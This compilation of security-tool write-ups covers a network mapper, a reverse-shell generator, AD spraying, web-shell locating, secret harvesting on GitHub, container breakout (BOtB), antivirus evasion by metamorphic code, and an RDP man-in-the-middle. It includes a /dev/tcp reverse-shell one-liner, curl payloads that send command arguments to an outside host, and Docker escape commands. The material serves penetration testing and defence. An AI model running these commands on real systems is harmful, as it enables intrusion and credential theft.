
LetsMapYourNetwork - Tool To Visualise Your Physical Network In Form Of Graph With Zero Manual Error


It is of utmost importance for any security engineer to understand their network before securing it, and gaining a 'true' understanding of a widespread network is a daunting task. In a mid-to-large organisation's network, a network architecture diagram alone doesn't provide complete understanding, and manual verification is a nightmare. Hence, in order to secure the entire network it is important to have a complete picture of all the systems connected to your network, irrespective of their type, function, technology etc.

BOTTOM LINE - YOU CAN'T SECURE WHAT YOU ARE NOT AWARE OF.
Let’s Map Your Network (LMYN) aims to provide an easy-to-use interface for security engineers and network administrators to have their network in graphical form with zero manual error, where a node represents a system and a relationship between nodes represents a connection.
LMYN does it in two phases:
  1. Learning: In this phase LMYN 'learns' the network by performing network commands and querying APIs, then builds the graph database leveraging the responses. The user can perform any of the learning activities at any point in time and LMYN will incorporate the results into the existing database.
  2. Monitoring: This is a continuous process, where LMYN monitors the 'in-scope' network for any changes, compares them with the existing information and updates the graph database accordingly.
The following technologies have been used in the tool:
  1. Django Python
  2. Neo4j DB
  3. Sigma JS
  4. Celery and RabbitMQ
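As an illustration of the node/relationship model described above, a minimal sketch using the official Neo4j Python driver might look like this (connection details and labels are placeholders; LMYN's own code may differ):
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))

def add_connection(tx, src_ip, dst_ip):
    # Each discovered system becomes a node; each observed connection becomes a relationship.
    tx.run(
        "MERGE (a:System {ip: $src}) "
        "MERGE (b:System {ip: $dst}) "
        "MERGE (a)-[:CONNECTS_TO]->(b)",
        src=src_ip, dst=dst_ip,
    )

with driver.session() as session:
    session.write_transaction(add_connection, "10.0.0.5", "10.0.0.17")
driver.close()
MERGE keeps the learning phase idempotent: re-running a scan updates the existing graph instead of duplicating nodes.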

WHY IT IS
  • Visualizing the infrastructure network in the form of a graph makes it more ‘visible’ and it becomes significantly easier to perform the analysis and identify the key areas of concern for a security engineer and network administrator
  • Also, Let’s Map Your Network formulates the graph entirely based either on network actions performed from a ‘seed’ system which is part of the actual network or on querying the APIs. Hence there is no chance of manual error in the mapping of the network

WHERE TO USE IT
  1. Network Architecture 'Validation'
  2. Troubleshooting for network administrator
  3. Internal Network vulnerability assessment and penetration testing

Presentations

Contributor
Jyoti Raval: (Brutal!) QA

LMYN In Action

Local subnet network


Network with traceroute to multiple destinations


CMDB Upload


Cloud network


Contact Information



Revshellgen - Reverse Shell Generator Written In Python.


Standalone python script for generating reverse shells easily and automating the boring stuff like URL encoding the command and setting up a listener.
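As a rough sketch of what such a generator automates (the attacker IP/port are placeholders and this is not revshellgen's actual code), building and URL-encoding a bash reverse-shell one-liner looks like this:
from urllib.parse import quote

lhost, lport = "10.0.0.1", 4444                        # attacker address (placeholders)
command = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"

print(command)                  # plain one-liner, paired with a listener such as `nc -lvnp 4444`
print(quote(command, safe=""))  # URL-encoded variant for web injection points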

Download
git clone https://github.com/t0thkr1s/revshellgen

Install
The script has 2 dependencies:
You can install these by typing:
python3 setup.py install

Disclaimer
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.


ActiveReign - A Network Enumeration And Attack Toolset


Background
A while back I was challenged to write a discovery tool with Python3 that could automate the process of finding sensitive information on network file shares. After writing the entire tool with pysmb, and adding features such as the ability to open and scan docx and xlsx files, I slowly started adding functionality from the awesome Impacket library; just simple features I wanted to see in an internal penetration testing tool. The more I added, the more it looked like a Python3 rewrite of CrackMapExec created from scratch.
If you are doing a direct comparison, CME is an amazing tool that has way more features than are currently implemented here. However, I added a few modifications that may come in handy during an assessment.

For more documentation checkout the project wiki

Operational Modes
  • db - Query or insert values in to the ActiveReign database
  • enum - System enumeration & module execution
  • shell - Spawn an emulated shell on a target system
  • spray - Domain password spraying and brute force
  • query - Perform LDAP queries on the domain

Key Features
  • Automatically extract domain information via LDAP and incorporate into network enumeration.
  • Perform Domain password spraying using LDAP to remove users close to lockout thresholds (see the sketch after this list).
  • Local and remote command execution, for use on multiple starting points throughout the network.
  • Emulated interactive shell on target system
  • Data discovery capable of scanning xlsx and docx files.
  • Various modules to add and extend capabilities.
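The lockout-aware spraying mentioned above can be sketched with ldap3 roughly as follows (hostnames, credentials and the threshold are placeholders; this is not ActiveReign's implementation):
from ldap3 import Server, Connection, ALL, NTLM

LOCKOUT_THRESHOLD = 3   # placeholder; the real value comes from the domain password policy

server = Server("dc01.corp.local", get_info=ALL)
conn = Connection(server, user="CORP\\lowpriv", password="Passw0rd!",
                  authentication=NTLM, auto_bind=True)

conn.search("DC=corp,DC=local",
            "(&(objectClass=user)(objectCategory=person))",
            attributes=["sAMAccountName", "badPwdCount"])

# Skip accounts that are one failed attempt away from lockout.
safe_targets = [entry.sAMAccountName.value for entry in conn.entries
                if (entry.badPwdCount.value or 0) < LOCKOUT_THRESHOLD - 1]
print(f"{len(safe_targets)} accounts are safe to spray")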

Acknowledgments
There were many intended and unintended contributors that made this project possible. If I am missing any, I apologize, it was in no way intentional. Feel free to contact me and we can make sure they get the credit they deserve ASAP!

Final Thoughts
Writing this tool and testing on a variety of networks/systems has taught me that execution method matters, and depends on the configuration of the system. If a specific module or feature does not work, determine if it is actually the program, target system, configuration, or even network placement before creating an issue.
To help this investigation process, I have created a test_execution module to run against a system with known admin privileges. This will cycle through all execution methods and provide a status report to determine the best method to use:
$ activereign enum -u administrator -p password --local-auth -M test_execution 192.168.3.20
[*] Lockout Tracker Using default lockout threshold: 3
[*] Enum Authentication \administrator (Password: p****) (Hash: False)
[+] WIN-T460 192.168.3.20 ENUM Windows 7 Ultimate 7601 Service Pack 1 (Domain: ) (Signing: False) (SMBv1: True) (Adm!n)
[*] WIN-T460 192.168.3.20 TEST_EXECUTION Execution Method: WMIEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS
[*] WIN-T460 192.168.3.20 TEST_EXECUTION Execution Method: SMBEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS


fileGPS - A Tool That Help You To Guess How Your Shell Was Renamed After The Server-Side Script Of The File Uploader Saved It


Introduction
When you upload a shell on a web server using a file upload functionality, the file usually gets renamed in various ways in order to prevent direct access to the file, RCE and file overwriting.
fileGPS is a tool that uses various techniques to find the new filename, after the server-side script renamed and saved it.
Some of the techniques used by fileGPS are:
  • Various hash of the filename
  • Various timestamps tricks
  • Filename + PHP time() up to 5 minutes before the start of the script
  • So many more



Features
  • Easy to use
  • Multithreaded
  • HTTP(s) Proxy support
  • User agent randomization
  • Over 100,000 filename combinations

Installation
On BlackArch Linux:
pacman -S filegps
On other distros:
git clone https://github.com/0blio/filegps

How to write a module
Writing a module is fairly simple and allows you to implement your custom ways of generating filename combinations.
Below is a template for your modules:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Module name: test
Coded by: Your name / nickname
Version: X.X

Description:
This module destroys the world.
"""
output = []

# Do some computations here

output = ["filename1.php", "filename2.asp", "filename3.jar"]
The variables url and filename are automatically imported from the core script, so you can call them in your module.
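As an illustration of the hash and time() techniques listed earlier, a module body could generate candidates roughly like this (the filename value is hard-coded here for clarity; in a real module it is injected by the core script as described above):
import hashlib
import time

filename = "shell.php"                        # normally provided by the core script
name, ext = filename.rsplit(".", 1)

output = []

# Hash-of-filename candidates
for algo in ("md5", "sha1"):
    output.append(hashlib.new(algo, name.encode()).hexdigest() + "." + ext)

# PHP time()-style candidates, up to 5 minutes back
now = int(time.time())
output.extend(f"{name}_{t}.{ext}" for t in range(now - 300, now + 1))

print(len(output), output[:3])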
Once you have finished writing your module, save it in Modules/, and it will be automatically imported when the main script starts.
You can use the module shame as a template for your modules.

Contribute to the project
Do you want to help? Here's some ways you can do it:
  • Suggest a feature
  • Write a module
  • Report a bug

Contacts
Email: michele.cisternino@protonmail.com

Special thanks
Special thanks to Panfilo Salutari for sharing with me ideas about the project.
Thanks to Claudio Sala for the logo.


gitGraber - Tool To Monitor GitHub To Search And Find Sensitive Data For Different Online Services Such As: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...


gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...


How does it work?
It's important to understand that gitGraber is not designed to check the history of repositories; many tools already do this well. gitGraber was originally developed to monitor and parse the latest indexed files on GitHub. If gitGraber finds something interesting, you will receive a notification on your Slack channel. You can also use it to get results directly on the command line.
In our experience, we are convinced that leaks do not come only from the organizations themselves, but also from service providers and employees, who do not necessarily have a "profile" indicating that they work for a particular organization.
Regexes are meant to be as precise as possible. You may sometimes get false positives; feel free to contribute to improve recon and add new regexes for pattern detection.
We prefer to reduce false positives rather than send a notification for every "standard" API key that gitGraber could find but that is irrelevant to the hunter.
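To give a feel for the regex-based detection, here is a short sketch (the two patterns are simplified examples, not gitGraber's actual rules):
import re

PATTERNS = {
    "AWS access key ID": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Slack webhook":     re.compile(r"https://hooks\.slack\.com/services/T\w+/B\w+/\w+"),
}

def scan(text):
    # Yield every pattern hit found in the given blob of text.
    for name, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            yield name, match.group(0)

sample = "config = {'key': 'AKIAABCDEFGHIJKLMNOP'}"
for name, token in scan(sample):
    print(f"[!] Possible {name}: {token}")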

How to use gitGraber?
usage: gitGraber.py [-h] [-k KEYWORDSFILE] [-q QUERY] [-s] [-w WORDLIST]

optional arguments:
  -h, --help            show this help message and exit
  -k KEYWORDSFILE, --keyword KEYWORDSFILE
                        Specify a keywords file (-k keywordsfile.txt)
  -q QUERY, --query QUERY
                        Specify your query (-q "apikey")
  -s, --slack           Enable slack notifications
  -w WORDLIST, --wordlist WORDLIST
                        Create a wordlist that fills dynamically with
                        discovered filenames on GitHub

Dependencies
gitGraber needs some dependencies; to install them in your environment:
pip3 install -r requirements.txt

Configuration
Before starting gitGraber, you need to modify the configuration file config.py:
  • Add your own Github tokens : GITHUB_TOKENS = ['yourToken1Here','yourToken2Here']
  • Add your own Slack Webhook : SLACK_WEBHOOKURL = 'https://hooks.slack.com/services/TXXXX/BXXXX/XXXXXXX'
How to create Slack Webhook URL
To start and use gitGraber : python3 gitGraber.py -k wordlists/keywords.txt -q "uber" -s
We recommend creating a cron job that will execute the script regularly:
*/10 * * * * cd /BugBounty/gitGraber/ && /usr/bin/python3 gitGraber.py -k wordlists/keywords.txt -q "uber" -s >/dev/null 2>&1

Wordlists & Resources
Some wordlists have been created by us, and others are inspired by other repositories/researchers.

TODO
  • Add more regex & patterns
  • Add a "combo check" module (for services like Twilio that require two tokens)
  • Add multi threads
  • Add bearer token detections
  • Change token cleaning output
  • Add user and org names display in notifications

Authors

Disclaimer
This project is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this tool.


Botb - A Container Analysis And Exploitation Tool For Pentesters And Engineers


BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.

What does it do?
BOtB is a CLI tool which allows you to:
  • Exploit common container vulnerabilities
  • Perform common container post exploitation actions
  • Provide capability when certain tools or binaries are not available in the Container
  • Use BOtB's capabilities with CI/CD technologies to test container deployments
  • Perform the above in either a manual or automated approach

Current Capabilities
  • Find and Identify UNIX Domain Sockets
  • Identify UNIX domain sockets which support HTTP
  • Find and identify the Docker Daemon on UNIX domain sockets or on an interface
  • Analyze and identify sensitive strings in ENV variables and processes in the ProcFS, i.e. /proc/{pid}/environ
  • Identify metadata services endpoints, i.e. http://169.254.169.254
  • Perform a container breakout via exposed Docker daemons
  • Perform a container breakout via CVE-2019-5736
  • Hijack host binaries with a custom payload
  • Perform actions in CI/CD mode and only return exit codes > 0
  • Scrape metadata info from GCP metadata endpoints
  • Push data to an S3 bucket
  • Break out of Privileged Containers
  • Force BOtB to always return an Exit Code of 0 (useful for non-blocking CI/CD)

Getting BOtB
BOtB is available as a binary in the Releases Section.

Building BOtB
BOtB is written in Go and can be built using the standard Go tools. The following can be done to get you started:
Getting the Code:
go get github.com/brompwnie/botb
or
git clone git@github.com:brompwnie/botb.git
Building the Code:
govendor init
govendor add github.com/tv42/httpunix
govendor add github.com/kr/pty
go build -o botbsBinary

Usage
BOtB can be compiled into a binary for the targeted platform and supports the following usage
Usage of ./botb:
  -aggr string
        Attempt to exploit RuncPWN (default "nil")
  -always-succeed
        Force BOtB to always return an Exit Code of 0
  -autopwn
        Attempt to autopwn exposed sockets
  -cicd
        Attempt to autopwn but don't drop to TTY, return exit code 1 if successful else 0
  -endpointlist string
        Provide a wordlist (default "nil")
  -find-docker
        Attempt to find Dockerd
  -find-http
        Hunt for Available UNIX Domain Sockets with HTTP
  -hijack string
        Attempt to hijack binaries on host (default "nil")
  -interfaces
        Display available network interfaces
  -metadata
        Attempt to find metadata services
  -path string
        Path to Start Scanning for UNIX Domain Sockets (default "/")
  -pwn-privileged string
        Provide a command payload to try exploit --privileged CGROUP release_agent's (default "nil")
  -recon
        Perform Recon of the Container ENV
  -region string
        Provide an AWS Region e.g. eu-west-2 (default "nil")
  -s3bucket string
        Provide a bucket name for S3 Push (default "nil")
  -s3push string
        Push a file to S3 e.g. Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME would be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil")
  -scrape-gcp
        Attempt to scrape the GCP metadata service
  -socket
        Hunt for Available UNIX Domain Sockets
  -verbose
        Verbose output
  -wordlist string
        Provide a wordlist (default "nil")
The following usage examples will return an Exit Code > 0 by default when an anomaly is detected; this is depicted by "echo $?", which shows the exit code of the last executed command.

Find UNIX Domain Sockets
#./bob_linux_amd64 -socket=true
[+] Break Out The Box
[+] Hunting Down UNIX Domain Sockets from: /
[!] Valid Socket: /var/meh
[+] Finished

#echo $?
1
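BOtB itself is written in Go; as a rough Python illustration of the underlying idea, walking a path and reporting socket files could look like this (the start path is just an example):
import os
import stat

def find_sockets(root="/"):
    # Walk the tree and yield every path whose mode marks it as a UNIX domain socket.
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if stat.S_ISSOCK(os.stat(path).st_mode):
                    yield path
            except OSError:
                continue    # unreadable or vanished entries

for sock in find_sockets("/var/run"):
    print(f"[!] Valid Socket: {sock}")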

Find a Docker Daemon
#./bob_linux_amd64 -find-docker=true
[+] Break Out The Box
[+] Looking for Dockerd
[!] Dockerd DOCKER_HOST found: tcp://0.0.0.0:2375
[+] Hunting Docker Socks
[!] Valid Docker Socket: /var/meh
[+] Finished

#echo $?
1

Break out from Container via Exposed Docker Daemon
This approach will break out into an interactive TTY on the host.
#./bob_linux_amd64 -autopwn=true    
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn: /var/meh
[+] Attempting to escape to host...
[+] Attempting in TTY Mode
./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh
chroot /host && clear
echo 'You are now on the underlying host'
You are now on the underlying host
/ #

Break out of a Container but in a CI/CD Friendly way
This approach does not escape into a TTY on the host but instead returns an Exit Code > 0 to indicate a successful container breakout.
#./bob_linux_amd64 -autopwn=true -cicd=true
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn: /var/meh
[+] Attempting to escape to host...
[!] Successfully escaped container
[+] Finished

#echo $?
1

Exploit CVE-2019-5736 with a Custom Payload
Please note that for this exploit to work, a process has to be executed in the target container in this scenario.
#./bob_linux_amd64 -aggr='curl "https://some.endpoint.com?command=$0&param1=$1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box
[!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE CONTAINER RUNTIME BUT YOU MIGHT GET SHELLZ...
[+] Attempting to exploit CVE-2019-5736 with command: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$
1&param2=$2">/dev/null 2>&1
[+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped
[+] Finished

Hijack Commands/Binaries on a Host with a Custom Payload
Please note that this can be used to test if external entities are executing commands within the container. Examples are Docker Exec and Kubectl CP.
#./bob_linux_amd64 -hijack='curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$
1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box
[!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ...
[+] Attempting to hijack binaries
[*] Command to be used: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1
[+] Currently hijacking: /bin
[+] Currently hijacking: /sbin
[+] Currently hijacking: /usr/bin
[+] Finished

Analyze ENV and ProcFS Environ for Sensitive Strings
By default BOtB will search for the two terms "secret" and "password".
 ./bob_linux_amd64 -recon=true
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[!] Sensitive keyword found in: /proc/1/environ -> 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=0e51200113eaTERM=xtermGOLANG_VERSION=1.12.4GOPATH=/gofoo=secretpasswordHOME=/root'
[!] Sensitive keyword found in: /proc/12/environ -> 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/app/binHOME=/rootfoo=secretpasswordTERM=xtermSHLVL=1PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin_=./bob_linux_amd64OLDPWD=/bin'
[!] Sensitive keyword found in: /proc/self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[!] Sensitive keyword found in: /proc/thread-self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[+] Checking ENV Variables for secrets
[!] Sensitive Keyword found in ENV: foo=secretpassword
[+] Finished

#echo $?
1
A wordlist can be supplied to BOtB to scan for particular keywords.
#cat wordlist.txt 
moo

# ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[*] Loading entries from: wordlist.txt
[+] Checking ENV Variables for secrets
[*] Loading entries from: wordlist.txt
[+] Finished

# echo $?
0
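As a rough Python illustration of this recon step (not BOtB's Go code), scanning /proc/*/environ and the current environment for the default keywords could look like:
import glob
import os

KEYWORDS = ("secret", "password")    # the documented defaults

def hits(blob):
    return [k for k in KEYWORDS if k in blob.lower()]

for path in glob.glob("/proc/*/environ"):
    try:
        with open(path, "rb") as f:
            env = f.read().decode(errors="ignore")
    except OSError:
        continue                     # processes we cannot read
    if hits(env):
        print(f"[!] Sensitive keyword found in: {path}")

for key, value in os.environ.items():
    if hits(f"{key}={value}"):
        print(f"[!] Sensitive Keyword found in ENV: {key}={value}")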

Scan for Metadata Endpoints
BOtB by default scans for two Metadata endpoints.
#  ./bob_linux_amd64 -metadata=true                    
[+] Break Out The Box
[*] Attempting to query metadata endpoint: 'http://169.254.169.254/latest/meta-data/'
[*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/'
[+] Finished

# echo $?
0
BOtB can also be supplied with a list of endpoints to scan for.
#  cat endpoints.txt 
https://heroku.com

# ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt
[+] Break Out The Box
[*] Loading entries from: endpoints.txt
[*] Attempting to query metadata endpoint: 'https://heroku.com'
[!] Reponse from 'https://heroku.com' -> 200
[+] Finished

# echo $?
1
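A minimal Python sketch of the same check (endpoints copied from the defaults above; this is not BOtB's Go implementation):
import urllib.request

ENDPOINTS = (
    "http://169.254.169.254/latest/meta-data/",
    "http://kubernetes.default.svc/",
)

for url in ENDPOINTS:
    print(f"[*] Attempting to query metadata endpoint: '{url}'")
    try:
        with urllib.request.urlopen(url, timeout=3) as resp:
            print(f"[!] Response from '{url}' -> {resp.status}")
    except OSError:
        pass    # unreachable endpoints are simply skipped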

Get Interfaces and IP's
#  ./bob_linux_amd64 -interfaces=true
[+] Break Out The Box
[+] Attempting to get local network interfaces
[*] Got Interface: lo
[*] Got address: 127.0.0.1/8
[*] Got Interface: tunl0
[*] Got Interface: ip6tnl0
[*] Got Interface: eth0
[*] Got address: 172.17.0.3/16
[+] Finished

Scan for UNIX Domain Sockets that respond to HTTP
#  ./bob_linux_amd64 -find-http=true
[+] Break Out The Box
[+] Looking for HTTP enabled Sockets
[!] Valid HTTP Socket: /var/run/docker.sock
[+] Finished

Scrape data from GCP metadata instance
#  ./botb_linux_amd64 -scrape-gcp=true
[+] Break Out The Box
[+] Attempting to connect to: 169.254.169.254:80

[*] Output->
HTTP/1.0 200 OK
Metadata-Flavor: Google
Content-Type: application/text
Date: Sun, 30 Jun 2019 21:53:41 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 21013
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0
0.1/meta-data/attached-disks/disks/0/index 0
0.1/meta-data/attached-disks/disks/0/mode READ_WRITE
.....

Push data to an AWS S3 Bucket
#  ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2
[+] Break Out The Box
[+] Pushing fileToPush.tar.gz -> nameOfS3Bucket
[*] Data uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz
[+] Finished

Break out of a Privileged Container
#  ./bob_linux_amd64 -pwn-privileged=hostname
[+] Break Out The Box
[+] Attempting to exploit CGROUP Privileges
[*] The result of your command can be found in /output
[+] Finished
root@418fa238e34d:/app# cat /output
docker-desktop

Force BOtB to always succeed with an Exit Code of 0
This is useful for non-blocking CI/CD tests.
#  ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed=true
[+] Break Out The Box
[+] Attempting to exploit CGROUP Privileges
[*] The result of your command can be found in /output
[+] Finished
# echo $?
0

Using BOtB with CI/CD
BOtB can be used with CI/CD technologies that make use of exit codes to determine if tests have passed or failed. Below is a shell script that executes two BOtB tests and uses their exit codes to set the exit code of the shell script. If either of the two tests returns an Exit Code > 0, the test executing the shell script will fail.
#!/bin/sh

exitCode=0

echo "[+] Testing UNIX Sockets"
./bob_linux_amd64 -autopwn -cicd=true
[ $? -gt 0 ] && exitCode=1

echo "[+] Testing Env"
./bob_linux_amd64 -recon=true
[ $? -gt 0 ] && exitCode=1

(exit $exitCode)
The above script is not the only way to use BOtB with CI/CD technologies; BOtB could also be used by itself and not wrapped in a shell script. An example YML config would be:
version: 2
cicd:
  runATest: ./bob_linux_amd64 -autopwn -cicd=true
Below is an example config that can be used with Heroku CI:
{
  "environments": {
    "test": {
      "scripts": {
        "test": "./bob_linux_amd64 -autopwn -cicd=true"
      }
    }
  }
}
Below is an example config with Heroku CI but using a wrapper shell script:
{
  "environments": {
    "test": {
      "scripts": {
        "test": "./bin/testSocksAndEnv.sh"
      }
    }
  }
}


Issues, Bugs and Improvements
For any bugs, please submit an issue. There is a long list of improvements but please submit an Issue if there is something you want to see added to BOtB.

References and Resources
This tool would not be possible without the contribution of others in the community, below is a list of resources that have helped me.

Talks and Events
BOtB is scheduled to be presented at the following:


Metame - Metame Is A Metamorphic Code Engine For Arbitrary Executables

metame is a simple metamorphic code engine for arbitrary executables.
From Wikipedia:
Metamorphic code is code that when run outputs a logically equivalent version of its own code under some interpretation. This is used by computer viruses to avoid the pattern recognition of anti-virus software.
metame's implementation works this way:
  1. Open a given binary and analyze the code
  2. Randomly replace instructions with equivalences in logic and size
  3. Copy and patch the original binary to generate a mutated variant

It currently supports the following architectures:
  • x86 32 bits
  • x86 64 bits
Also, it supports a variety of file formats, as radare2 is used for file parsing and code analysis.
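Since radare2 does the parsing and analysis, a rough illustration of a size-preserving substitution with r2pipe could look like this (the target file and the specific equivalence are examples, not metame's actual code):
import r2pipe

# xor eax, eax (31 c0) and sub eax, eax (29 c0) have the same length and both zero eax.
r2 = r2pipe.open("./target.bin", flags=["-w"])    # open the binary writable
r2.cmd("aaa")                                     # analyze so `main` is resolvable

for op in r2.cmdj("pdfj @ main")["ops"]:
    if op.get("disasm") == "xor eax, eax":
        r2.cmd(f"wx 29c0 @ {op['offset']}")       # patch the equivalent bytes in place
        print(f"patched instruction at {hex(op['offset'])}")

r2.quit()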
Example of code before and after mutation:


Hint: Two instructions have been replaced in this snippet.
Here is another example of how it can mutate a NOP sled into equivalent code:


Installation
pip install metame
This should also install the requirements.
You will also need radare2. Refer to the official website for installation instructions.
simplejson is also a "nice to have" for a small performance boost:
pip install simplejson

Usage
metame -i original.exe -o mutation.exe -d
Use metame -h for help.


Grapl - Graph Platform For Detection And Response

Grapl is a Graph Platform for Detection and Response.
For a more in depth overview of Grapl, read this.
In short, Grapl will take raw logs, convert them into graphs, and merge those graphs into a Master Graph. It will then orchestrate the execution of your attack signatures and provide tools for performing your investigations.
Grapl supports nodes for:
  • Processes (Beta)
  • Files (Beta)
  • Networking (Alpha)
and currently parses Sysmon logs or a generic JSON log format to generate these graphs.

Key Features
Identity
If you’re familiar with log sources like Sysmon, one of the best features is that processes are given identities. Grapl applies the same concept but for any supported log type, taking pseudo-identifiers such as process IDs and discerning canonical identities.
This cuts down on storage costs and gives you central locations to view your data, as opposed to having it spread across thousands of logs. As an example, given a process’s canonical identifier you can view all of the information for it by selecting the node.


Analyzers (Beta)
Analyzers are your attacker signatures. They’re Python modules, deployed to Grapl’s S3 bucket, that are orchestrated to execute upon changes to Grapl’s Master Graph.
Analyzers execute in real time as the master graph is updated.
Grapl provides an analyzer library (alpha) so that you can write attacker signatures using pure Python. See this repo for examples.
Here is a brief example of how to detect a suspicious execution of svchost.exe:
valid_parents = get_svchost_valid_parents()
p = (
    ProcessQuery()
    .with_process_name(eq=valid_parents)
    .with_children(
        ProcessQuery().with_process_name(eq="svchost.exe")
    )
    .query_first(client, contains_node_key=process.node_key)
)
Keeping your analyzers in code means you can:
  • Code review your alerts
  • Write tests, integrate into CI
  • Build abstractions, reuse logic, and generally follow best practices for maintaining software
Engagements (alpha)
Grapl provides a tool for investigations called an Engagement. Engagements are an isolated graph representing a subgraph that your analyzers have deemed suspicious.
Using AWS Sagemaker hosted Jupyter Notebooks, Grapl will (soon) provide a Python library for interacting with the Engagement Graph, allowing you to pivot quickly and maintain a record of your investigation in code.


Grapl provides a live updating view of the engagement graph as you interact with it in the notebook, currently in alpha.


Event Driven and Extendable
Grapl was built to be extended - no service can satisfy every organization’s needs. Every native Grapl service works by sending and receiving events, which means that in order to extend Grapl you only need to start subscribing to messages.
This makes Grapl trivial to extend or integrate into your existing services.



Setup
Setting up a basic playground version of Grapl is pretty simple.
To get started you'll need to install npm, typescript, and the aws-cdk.
Your aws-cdk version should match the version in Grapl's package.json file.
Clone the repo:
git clone https://github.com/insanitybit/grapl.git
Change directories to the grapl/grapl-cdk/ folder. There should already be build binaries.
Execute npm i to install the aws-cdk dependencies.
Add a .env file, and fill it in:
BUCKET_PREFIX="<unique prefix to differentiate your buckets>"
Run the deploy script ./deploy_all.sh
It will require confirming some changes to security groups, and will take a few minutes to complete.
This will give you a Grapl setup that’s adequate for testing out the service.
You can send some test data up to the service by going to the root of the grapl repo and calling: python ./gen-raw-logs.py <your bucket prefix>.
This requires the boto3 and zstd Python modules.
Note that this may impose charges to your AWS account.



Pyrdp - RDP Man-In-The-Middle And Library For Python3 With The Ability To Watch Connections Live Or After The Fact


PyRDP is a Python 3 Remote Desktop Protocol (RDP) Man-in-the-Middle (MITM) and library.
It features a few tools:
  • RDP Man-in-the-Middle
    • Logs credentials used when connecting
    • Steals data copied to the clipboard
    • Saves a copy of the files transferred over the network
    • Saves replays of connections so you can look at them later
    • Run console commands or PowerShell payloads automatically on new connections
  • RDP Player:
    • See live RDP connections coming from the MITM
    • View replays of RDP connections
    • Take control of active RDP sessions while hiding your actions
    • List the client's mapped drives and download files from them during active sessions
  • RDP Certificate Cloner:
    • Create a self-signed X509 certificate with the same fields as an RDP server's certificate
We have used this tool as part of an RDP honeypot which records sessions and saves a copy of the malware dropped on our target machine.
PyRDP was first introduced in a blogpost in which we demonstrated that we can catch a real threat actor in action. In May 2019 a presentation by its authors was given at NorthSec and two demos were performed. The first one covered credential logging, clipboard stealing, client-side file browsing and a session take-over. The second one covered the execution of cmd or powershell payloads when a client successfully authenticates. In August 2019, PyRDP was demo'ed at BlackHat Arsenal (slides).

Supported Systems
PyRDP should work on Python 3.6 and up.
This tool has been tested to work on Python 3.6 on Linux (Ubuntu 18.04) and Windows (See section Installing on Windows). It has not been tested on OSX.

Installing
We recommend installing PyRDP in a virtual environment to avoid dependency issues.
First, make sure to install the prerequisite packages (on Ubuntu):
sudo apt install libdbus-1-dev libdbus-glib-1-dev
On some systems, you may need to install the python3-venv package:
sudo apt install python3-venv
Then, create your virtual environment in PyRDP's directory:
cd pyrdp 
python3 -m venv venv
DO NOT use the root PyRDP directory for the virtual environment folder (python3 -m venv .). You will make a mess, and using a directory name like venv is more standard anyway.
